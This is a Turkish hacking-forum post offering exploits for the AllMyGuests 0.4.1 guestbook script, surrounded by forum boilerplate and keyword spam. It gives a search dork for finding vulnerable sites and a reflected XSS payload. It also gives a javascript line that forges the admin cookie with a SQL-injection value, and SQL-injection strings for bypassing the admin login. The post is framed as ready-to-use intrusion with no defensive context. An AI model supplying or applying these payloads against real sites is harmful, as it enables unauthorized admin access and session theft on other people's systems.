Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
SQL Injection / Insecure Cookie Handling
#1
Dork: powered by AllMyGuests © 2003, voice of web
==========================

php info :

http://localhost/AllMyGuests0.4.1/tools/phpinfo.php

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code
(usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or
not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens
retained by the browser.
This vulnerability affects /AllMyGuests0.4.1/index.php.
Discovered by: Scripting (XSS.script).
Attack details
POST (multipart) input AMG_signin_topic was set to 1" onmouseover=prompt(988847) bad="
The input is reflected inside a tag parameter between double quotes.

Insecure Cookie Handling :

admin.php

javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

Auth Bypass :

Username : azerty' or '1=1--# Real admin name
Password : demo1 ' or ' 1=1 or admin or any thing
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  創意細胞 SQL Injection H4Sec 27 751 10-03-2016, Saat: 18:37
Son Yorum: byhacı
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,109 01-03-2016, Saat: 03:59
Son Yorum: Zany
  Joomla Nice Ajax Poll 1.4.0 SQL Injection ERTUĞRUL 0 123 12-12-2015, Saat: 03:08
Son Yorum: ERTUĞRUL
  Grow-Easy CMS SQL Injection Vulnerability Stallk3r 7 459 16-08-2015, Saat: 04:28
Son Yorum: comertcimen
  Medical Website Design SQL Injection Vulnerability Stallk3r 9 646 05-08-2015, Saat: 13:43
Son Yorum: mavisimsek
Anahtar Kelimeler

SQL Injection / Insecure Cookie Handling indir, SQL Injection / Insecure Cookie Handling Videosu, SQL Injection / Insecure Cookie Handling Online izle, SQL Injection / Insecure Cookie Handling Bedava indir, SQL Injection / Insecure Cookie Handling Yükle, SQL Injection / Insecure Cookie Handling Hakkında, SQL Injection / Insecure Cookie Handling Nedir, SQL Injection / Insecure Cookie Handling Free indir, SQL Injection / Insecure Cookie Handling Oyunu, SQL Injection / Insecure Cookie Handling Download


1 Ziyaretçi